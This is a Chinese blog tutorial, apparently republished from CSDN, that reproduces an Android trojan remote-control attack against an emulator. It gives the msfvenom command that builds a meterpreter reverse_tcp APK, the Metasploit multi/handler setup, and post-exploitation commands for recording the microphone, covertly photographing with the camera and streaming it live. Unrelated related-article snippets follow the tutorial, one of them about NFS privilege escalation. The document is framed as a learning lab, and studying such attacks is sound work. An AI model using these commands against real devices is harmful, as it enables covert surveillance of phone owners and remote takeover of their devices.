手机木马远程控制复现

目录

目录

前言

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

4.2,使用攻击模块

4.3,设置攻击载荷

4.4,设置攻击机和端口号和攻击:

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 成功后我们能做什么?

5.1,查看模拟手机的版本信息

5.2,查看手机的网络信息

5.3,查看root状态

5.4,启用网页视屏聊天

5.5,查看手机有几个摄像头

5.6,进行录音操作

5.7,一些其他操作

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结


前言

本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试.

系列文章列表


渗透测试基础之永恒之蓝漏洞复现icon-default.png?t=N7T8http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

  • Kali平台(Hack):192.168.10.xxx
  • Android模拟器(靶机1)
  • kali需要使用桥接模式,不然无法使用

                         如果出现桥接无法使用可以看这位大佬的配置教程 

                                kali无法连接网络(桥接、NAT无效)icon-default.png?t=N7T8http://t.csdn.cn/r9cug

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

                                                   打开官网进行下载

雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)icon-default.png?t=N7T8https://www.ldmnq.com/

2.2,安装雷电模拟器 

                   下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。

                         安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

   安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制.

2.3.2,进行配置 

对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk

3.2,将文件复制到windows系统上

生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器,点击启动:

3.3,将apk文件安装到模拟器中

                           这里我们可以将文件拖入或是选择文件放入也行

                                     在右下角有个apk,点击选择文件安装。

3.4,木马文件安装成功

                                出现下面的图标代表安装木马文件成功

4,使用metasploit控制台对模拟器进行攻击

这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍

4.1 启动metasploit

msfconsole 

4.2,使用攻击模块

use exploit/multi/handler

4.3,设置攻击载荷

                                           攻击载荷也就是攻击的脚本

set payload android/meterpreter/reverse_tcp

4.4,设置攻击机和端口号和攻击:

                 这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致

set lhost 192.168.xxx.xxx
set lport 5001
run

 

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

                                     只要双击一次即可,这里是我多点了

5, 攻击成功后我们能做什么?

                                    这里在进行其他操作前需要先加载stdapi扩展

load stdapi

5.1,查看模拟手机的版本信息

sysinfo

5.2,查看手机的网络信息

ifconfig

5.3,查看root状态

check_root

                                                         手机无root权限

5.4,启用网页视屏聊天

webcam_chat

5.5,查看手机有几个摄像头

webcam_list

                                                        显示有两个摄像头 

5.6,进行录音操作

record_mic

5.7,一些其他操作

                                    进行调用摄像头偷拍,默认为前置摄像头

webcam_snap

网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法可以获取到一段图片资料 

webcam_stream

                              获得shell后有很多的攻击方法,将其汇总如下

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结

本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力.

每日一言

如果可以的话,我也想成为这个世界中特殊的存在。

  如果我的学习笔记对你有用,不妨点赞收藏一下,感谢你的支持,当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充,对我学习大有帮助,谢谢。  

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/131543.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

用Navicat备份Mysql演示系统数据库的时候出:Too Many Connections

今天用Navicat进行数据备份的时候,发现由于数据库连接数目过多导致连接锁定,这种情况在多人协同开发的场景中很常见。当然我这里也因为多个应用使用了数据库连接,所以出现了Too Many Connections。 可能是超过最大连接数了。 1、进入Navicat…

亚信科技AntDB数据库携“U8C+AntDB联合产品”亮相“2023全球商业创新大会”,开启生态合作新篇章

8月18-19日,近万人齐聚上海国家会展中心,带着对数字化、数智化趋势和热点的关注,以满腹热情投身到以“数据驱动 智能运营”为主题的“2023全球商业创新大会”,共商新技术条件下企业信息化出现的新课题、新挑战,共享数智…

spice VDAgent简介

vdagent分为linux和windows,其中Linux分为vdagent守护进程和vdagent客户端进程,而windows主要为vdagent服务。 在windows中,通过服务方式自启动,并控制windows显示等。 在linux中, 守护进程通过 Sys-V initscript 或 s…

【配电变电站的最佳位置和容量】基于遗传算法的最优配电变电站放置(Matlab代码实现)

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势:🌞🌞🌞博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。 ⛳️座右铭&a…

十二、集合(5)

本章概要 for-in 和迭代器 适配器方法惯用法 本章小结 简单集合分类 for-in和迭代器 到目前为止,for-in 语法主要用于数组,但它也适用于任何 Collection 对象。实际上在使用 ArrayList 时,已经看到了一些使用它的示例,下面是它…

【C++】泛型编程 | 函数模板 | 类模板

一、泛型编程 泛型编程是啥? 编写一种一般化的、可通用的算法出来,是代码复用的一种手段。 类似写一个模板出来,不同的情况,我们都可以往这个模板上去套。 举个例子: void Swap(int& a, int& b) {int tmp …

如何在Robosuite中导入自建的物体模型

Robosuite是基于mujoco封装的机器人操作库,而mujoco的碰撞检测是基于凸壳,也就是geom必须是凸的,如果是凹的话,凹的部分会有一个透明的屏障而无法与其他物体有碰撞。但是实际场景很多物体都不是凸的,比如杯子的口是凹进…

六招带你认识炫酷的新的室内工业艺术风格

就在设计师们以为他们已经见识过所有可能的风格和样式组合时,工业风出现了。这种原始与精致的开创性组合从大都市的仓库和工厂改建而来,对现代装饰产生了巨大的影响。 工业风格的起源 工业风格住宅和工业风格公寓的起源 由于大城市缺乏经济适用房&…

模拟实现字符串函数和内存函数

模拟实现字符串函数和内存函数 函数介绍部分模拟实现strlenstrcpy,strcat,strcmpstrncpy,strncat,strncmpstrstr,strtokstrerror 字符分类函数内存函数memcpy,memmove,memset,memcmp 求字符串长度(strlen)长度不受限制的字符串函数(strcpy,strcat,strcmp)长度受限制的字符串函数…

科学中的人工智能:量子、原子和连续体技术概述

人工智能(AI)的进步正在推动自然科学领域的一种新的发现范式。如今,AI已经开始通过改进、加速和促进我们对各种空间和时间尺度上自然现象的理解来推动自然科学的发展,催生了一个被称为AI for science(AI4Science&#…

Vue中的生命周期钩子

生命周期钩子 :::warning 注意 所有生命周期钩子的 this 上下文将自动绑定至实例中,因此你可以利用 this 访问 props、data、computed 和 methods 等选项内的数据/函数。这意味着你不应该使用箭头函数来定义一个生命周期方法,因为箭头函数中没有 this&a…

牛客:小美的01串翻转

小美的01串翻转 #include<iostream> #include<cstring> #include<string> #include<vector>using namespace std; typedef long long ll; const int N 1100; string s; ll res 0;int main() {cin>>s;int n s.size();vector<vector<in…

第三方服务提权

nfs挂载原理 目标机器192.168.17.138 开启2049 nfs端口 查看目标开放的文件夹 showmount -e 192.168.17.138 回显&#xff1a;/home/peter * 说明可挂载/home/peter的所有目录 使用WinSCP链接靶机192.168.17.138 更改名字为 authorized_keys 靶机 赋值权限 攻击机 nfs挂载提…

2023最新UI工作室官网个人主页源码/背景音乐/随机壁纸/一言

2023最新UI工作室官网个人主页源码/支持背景音乐/随机壁纸/一言 功能介绍&#xff1a; 载入动画 站点简介 Hitokoto 一言 日期及时间 实时天气 时光进度条 音乐播放器 移动端适配 打开文件&#xff1b;index.html和setting.json修改替换你的相关信息&a…

Unity的GPUSkinning进一步介绍

大家好&#xff0c;我是阿赵。   在几年前&#xff0c;我曾经写过一篇介绍GPUSkinning的文章&#xff0c;这么多年之后&#xff0c;还是看到不停有朋友在翻看这篇旧文章。今天上去GitHub看了一下&#xff0c;GPUSkinning这个开源的插件已经很久没有更新过了&#xff0c;还是停…

虹科方案 | HK-NEOs系列带来先进的磁带自动化解决方案

一、HK-NEOs 系列自动磁带库 通常只有在昂贵的企业解决方案中才能找到的高级功能&#xff0c;我们的入门级磁带自动化产品就能够具备。使用 HK-NEOs 系列自动化磁带库&#xff0c;可以获得远程管理、可拆卸盒式磁带卷、可升级磁带驱动器、条形码阅读器等更多功能。 但这还不是…

JavaScript逻辑题:输出1000之内的所有完数。所谓完数指的是:如果一个数恰好等于它的所有因子之和,这个数就称为完数。

// 定义函数function judgeNum(){// 定义数组存储完数let arr []// for循环1000以内的所有数for(let i 1;i<1000;i){// 定义sum存储一个数的因子之和let sum 0;// 内层循环一个数的因子for(let j 1;j<i;j){if(i % j 0){sum j;}}// 如果一个数和它的因子之和相等&am…

FPGA-结合协议时序实现UART收发器(六):仿真模块SIM_uart_drive_TB

FPGA-结合协议时序实现UART收发器&#xff08;六&#xff09;&#xff1a;仿真模块SIM_uart_drive_TB 仿真模块SIM_uart_drive_TB&#xff0c;仿真实现。 vivado联合modelsim进行仿真。 文章目录 FPGA-结合协议时序实现UART收发器&#xff08;六&#xff09;&#xff1a;仿真模…

JavaScript逻辑题:牙膏2元 牙刷5元 牙膏盒15元 请问正好花完100元 有多少情况?

// 定义牙膏 牙刷 牙膏盒分别的价格 let toothpaste 0;let toothbrush 0;let toothpastebox 0;// 定义sum用来存储几种情况let sum 0;//第一层循环 循环牙膏买多少for (let i 0; i < 20; i){toothpaste 5 * i;// 二层循环 循环牙刷的数量for (let j 0; j < 50; j…

合伙企业是什么?

合伙企业可能大家听说也较多&#xff0c;但是到底什么是合伙企业&#xff0c;可能就没那么清楚了。看完今日的内容&#xff0c;你就会知道原来这就是合伙企业啊。 一、什么是合伙企业&#xff1f; 根据《中华人民共和国合伙企业法》&#xff0c;合伙企业是由两个或两个以上的自…